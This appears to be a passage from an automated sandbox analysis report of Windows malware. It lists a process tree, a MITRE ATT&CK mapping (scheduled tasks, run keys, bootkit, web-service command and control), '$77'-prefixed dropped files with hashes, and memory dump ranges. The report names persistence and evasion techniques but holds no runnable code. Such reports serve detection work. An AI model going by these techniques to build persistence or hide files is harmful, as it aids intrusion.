                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                        1⤵
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:624
                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                        1⤵
                                                                                                                          PID:3500
                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                          1⤵
                                                                                                                            PID:1996
                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                            1⤵
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Writes to the Master Boot Record (MBR)
                                                                                                                            • Enumerates system info in registry
                                                                                                                            PID:1040
                                                                                                                          • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                            C:\Windows\System32\WaaSMedicAgent.exe 879d428bfc393a7980661c64eb6fdfe8 XlE41ATQV0aVT9QlSRxzIw.0.1.0.0.0
                                                                                                                            1⤵
                                                                                                                            • Sets service image path in registry
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:2368
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              2⤵
                                                                                                                                PID:4040
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                              1⤵
                                                                                                                              • Drops file in Windows directory
                                                                                                                              PID:3120
                                                                                                                            • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                              C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                              1⤵
                                                                                                                                PID:1836
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                1⤵
                                                                                                                                  PID:4984

                                                                                                                                Network

                                                                                                                                MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                Execution

                                                                                                                                Scheduled Task/Job

                                                                                                                                1
                                                                                                                                T1053

                                                                                                                                Scheduled Task

                                                                                                                                1
                                                                                                                                T1053.005

                                                                                                                                Persistence

                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                2
                                                                                                                                T1547

                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                2
                                                                                                                                T1547.001

                                                                                                                                Pre-OS Boot

                                                                                                                                1
                                                                                                                                T1542

                                                                                                                                Bootkit

                                                                                                                                1
                                                                                                                                T1542.003

                                                                                                                                Scheduled Task/Job

                                                                                                                                1
                                                                                                                                T1053

                                                                                                                                Scheduled Task

                                                                                                                                1
                                                                                                                                T1053.005

                                                                                                                                Privilege Escalation

                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                2
                                                                                                                                T1547

                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                2
                                                                                                                                T1547.001

                                                                                                                                Scheduled Task/Job

                                                                                                                                1
                                                                                                                                T1053

                                                                                                                                Scheduled Task

                                                                                                                                1
                                                                                                                                T1053.005

                                                                                                                                Defense Evasion

                                                                                                                                Modify Registry

                                                                                                                                2
                                                                                                                                T1112

                                                                                                                                Pre-OS Boot

                                                                                                                                1
                                                                                                                                T1542

                                                                                                                                Bootkit

                                                                                                                                1
                                                                                                                                T1542.003

                                                                                                                                Discovery

                                                                                                                                Query Registry

                                                                                                                                5
                                                                                                                                T1012

                                                                                                                                System Information Discovery

                                                                                                                                5
                                                                                                                                T1082

                                                                                                                                Peripheral Device Discovery

                                                                                                                                1
                                                                                                                                T1120

                                                                                                                                Command and Control

                                                                                                                                Web Service

                                                                                                                                1
                                                                                                                                T1102

                                                                                                                                Replay Monitor

                                                                                                                                Loading Replay Monitor...

                                                                                                                                Downloads

                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.log
                                                                                                                                  Filesize

                                                                                                                                  654B

                                                                                                                                  MD5

                                                                                                                                  2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                                  SHA1

                                                                                                                                  684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                                  SHA256

                                                                                                                                  e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                                  SHA512

                                                                                                                                  1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                                                                                                                                  Filesize

                                                                                                                                  66KB

                                                                                                                                  MD5

                                                                                                                                  f10712f4faa374be8f37668c5ebed4a6

                                                                                                                                  SHA1

                                                                                                                                  bb30e941c4f91ae3178539e993abecbfd838fdb0

                                                                                                                                  SHA256

                                                                                                                                  d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf

                                                                                                                                  SHA512

                                                                                                                                  cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                                                                                                                                  Filesize

                                                                                                                                  163KB

                                                                                                                                  MD5

                                                                                                                                  1a7d1b5d24ba30c4d3d5502295ab5e89

                                                                                                                                  SHA1

                                                                                                                                  2d5e69cf335605ba0a61f0bbecbea6fc06a42563

                                                                                                                                  SHA256

                                                                                                                                  b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

                                                                                                                                  SHA512

                                                                                                                                  859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                                                                                                                                  Filesize

                                                                                                                                  256KB

                                                                                                                                  MD5

                                                                                                                                  18f497deffe88b6b2cff336a277aface

                                                                                                                                  SHA1

                                                                                                                                  4e1413241d3d3e4dbff399d179f8fd64f3ecd39e

                                                                                                                                  SHA256

                                                                                                                                  8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5

                                                                                                                                  SHA512

                                                                                                                                  35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                                                                                                                                  Filesize

                                                                                                                                  50KB

                                                                                                                                  MD5

                                                                                                                                  77a71f3a441aa3bf824967e52413bec5

                                                                                                                                  SHA1

                                                                                                                                  c3d6df5cfc5eefaadf9bcb3703484e3cadf79588

                                                                                                                                  SHA256

                                                                                                                                  1e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82

                                                                                                                                  SHA512

                                                                                                                                  31c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp9F0F.tmp.bat
                                                                                                                                  Filesize

                                                                                                                                  155B

                                                                                                                                  MD5

                                                                                                                                  64066edfd8c8c9d8c6b0f9ad4d7e7b7b

                                                                                                                                  SHA1

                                                                                                                                  c0e0caf9de83e7044baa3067e8ed0d6045fa91af

                                                                                                                                  SHA256

                                                                                                                                  97bef182a4f189659dc3f29b390d2982929a53363d52ed0ae538e5557ebe4275

                                                                                                                                  SHA512

                                                                                                                                  4539c27e7d19d92c6ae78eaed456b8884363a7b5b02e6555755785ccdd826fbd47712c04b1f176103eb6a4d2a89a0bccb0ebadd2005a116ea355eb51b5c098dd

                                                                                                                                • C:\Windows\TEMP\tmpA9FB.tmp.bat
                                                                                                                                  Filesize

                                                                                                                                  163B

                                                                                                                                  MD5

                                                                                                                                  82cff771f5910f91493b9b5c0f51964a

                                                                                                                                  SHA1

                                                                                                                                  acda34e036c3296d4eb456b84d5fc14dedfe750f

                                                                                                                                  SHA256

                                                                                                                                  6293b9d57282dbb904f2a942282302a7c8290f70a006430abd6d5ad26f81aba7

                                                                                                                                  SHA512

                                                                                                                                  ed5445c39f53ee604ee2c8d8ee83a3787abf6f3e797f7ffefde85b9d7642f7bc072ad34e6a30c69df41b9e4a75ec9fa14aed7897ca9510f7d60797b25e4e202f

                                                                                                                                • C:\Windows\Temp\__PSScriptPolicyTest_04qlnryp.xkw.ps1
                                                                                                                                  Filesize

                                                                                                                                  60B

                                                                                                                                  MD5

                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                  SHA1

                                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                  SHA256

                                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                  SHA512

                                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                • memory/380-285-0x000001BAD9AB0000-0x000001BAD9ADB000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/380-291-0x000001BAD9AB0000-0x000001BAD9ADB000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/380-292-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/436-237-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/436-247-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/436-235-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/436-241-0x00007FFBB6C70000-0x00007FFBB6D2E000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  760KB

                                                                                                                                • memory/436-240-0x00007FFBB6E90000-0x00007FFBB7085000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                • memory/436-239-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/436-236-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/436-234-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/612-250-0x0000013971180000-0x00000139711A5000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  148KB

                                                                                                                                • memory/612-251-0x00000139711B0000-0x00000139711DB000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/612-252-0x00000139711B0000-0x00000139711DB000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/612-258-0x00000139711B0000-0x00000139711DB000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/612-259-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/668-270-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/668-264-0x000001CEE0E50000-0x000001CEE0E7B000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/668-269-0x000001CEE0E50000-0x000001CEE0E7B000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/732-296-0x00000127AE4F0000-0x00000127AE51B000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/952-280-0x00000226FBFD0000-0x00000226FBFFB000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/952-274-0x00000226FBFD0000-0x00000226FBFFB000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/952-281-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/2840-233-0x00007FFBB6C70000-0x00007FFBB6D2E000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  760KB

                                                                                                                                • memory/2840-225-0x000001A81BB30000-0x000001A81BB52000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  136KB

                                                                                                                                • memory/2840-232-0x00007FFBB6E90000-0x00007FFBB7085000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                • memory/2840-231-0x000001A8344F0000-0x000001A83451A000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/2932-0-0x0000000074D2E000-0x0000000074D2F000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/2932-1104-0x0000000074D2E000-0x0000000074D2F000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/2932-1-0x0000000000620000-0x00000000018C0000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  18.6MB

                                                                                                                                • memory/3984-113-0x0000000000340000-0x0000000000352000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  72KB

                                                                                                                                • memory/3984-65-0x00007FFB974D3000-0x00007FFB974D5000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/4280-219-0x00000000010B0000-0x00000000010B6000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  24KB

                                                                                                                                • memory/4280-208-0x00000000007C0000-0x0000000000806000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  280KB

                                                                                                                                • memory/4576-127-0x0000000000A30000-0x0000000000A46000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  88KB